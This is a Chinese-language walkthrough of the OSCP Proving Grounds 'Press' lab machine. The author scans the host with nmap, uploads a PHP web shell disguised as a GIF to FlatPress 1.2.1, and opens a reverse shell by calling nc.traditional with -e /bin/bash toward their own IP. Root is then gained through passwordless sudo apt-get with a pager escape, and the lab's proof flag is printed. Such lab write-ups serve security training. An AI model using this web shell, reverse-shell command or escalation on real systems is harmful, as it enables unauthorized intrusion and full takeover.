OSCP - Proving Grounds - Press

主要知识点

• 也许nc的可执行文件名字会不一样

具体步骤

执行nmap,发现安装了flatPress 1.2.1

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-22 14:34 UTC
Nmap scan report for 192.168.58.29
Host is up (0.00062s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 c9:c3:da:15:28:3b:f1:f8:9a:36:df:4d:36:6b:a7:44 (RSA)
|   256 26:03:2b:f6:da:90:1d:1b:ec:8d:8f:8d:1e:7e:3d:6b (ECDSA)
|_  256 fb:43:b2:b0:19:2f:d3:f6:bc:aa:60:67:ab:c1:af:37 (ED25519)
80/tcp   open  http    Apache httpd 2.4.56 ((Debian))
|_http-title: Lugx Gaming Shop HTML5 Template
|_http-server-header: Apache/2.4.56 (Debian)
8089/tcp open  http    Apache httpd 2.4.56 ((Debian))
|_http-title: FlatPress
|_http-generator: FlatPress fp-1.2.1
|_http-server-header: Apache/2.4.56 (Debian)

搜索一下相关信息，得到Flatpress 1.2.1 - File upload bypass to RCE Vulnerebility · Issue #152 · flatpressblog/flatpress · GitHub

按照步骤一步一步去复现

C:\home\kali\Documents\OFFSEC\GoToWork\Press> cat rev.php                                                

GIF89a;
<?php
  system($_GET['cmd']); 
?>

确实可以执行cmd,但是创建反弹shell的时候出现了挑战，各种方式都不行，但是查看一下whereis nc后，发现确实安装了nc，而且还是两个不同版本的nc,用不同的文件名区分

在本地执行nc -nlvp 8080后，调用如下Link,反弹shell创建成功

192.168.247.29:8089/fp-content/attachs/rev.php?cmd=/usr/bin/nc.traditional 192.168.45.243 8080 -e/bin/bash

执行sudo -l后发现可以无需密码 sudo /usr/bin/apt-get,

C:\home\kali\Documents\OFFSEC\GoToWork\Press> nc -nlvp 8080
listening on [any] 8080 ...
connect to [192.168.45.243] from (UNKNOWN) [192.168.247.29] 38304
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
clear
whereis python
python: /usr/bin/python3.9 /usr/lib/python2.7 /usr/lib/python3.9 /etc/python3.9 /usr/local/lib/python3.9
/usr/bin/python3.9 -c 'import pty;pty.spawn("/bin/bash")'
www-data@debian:/var/www/flatpress/fp-content/attachs$ 
www-data@debian:/var/www/flatpress/fp-content/attachs$ sudo -l
sudo -l
Matching Defaults entries for www-data on debian:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on debian:
    (ALL) NOPASSWD: /usr/bin/apt-get

参考GTFOBins的建议

成功提权

www-data@debian:/var/www/flatpress/fp-content/attachs$ sudo apt-get changelog apt  
<ress/fp-content/attachs$ sudo apt-get changelog apt   
Get:1 store: apt 2.2.4 Changelog
Fetched 487 kB in 0s (48.5 MB/s)
WARNING: terminal is not fully functional
/tmp/apt-changelog-ckmFFy/apt.changelog  (press RETURN)!/bin/bash
!//bbiinn//bbaasshh!/bin/bash
root@debian:/var/www/flatpress/fp-content/attachs# id
id
uid=0(root) gid=0(root) groups=0(root)
root@debian:/var/www/flatpress/fp-content/attachs# cat /root/proof.txt
cat /root/proof.txt
67e4a1ea60acd1c2223841b63eae78c0
root@debian:/var/www/flatpress/fp-content/attachs#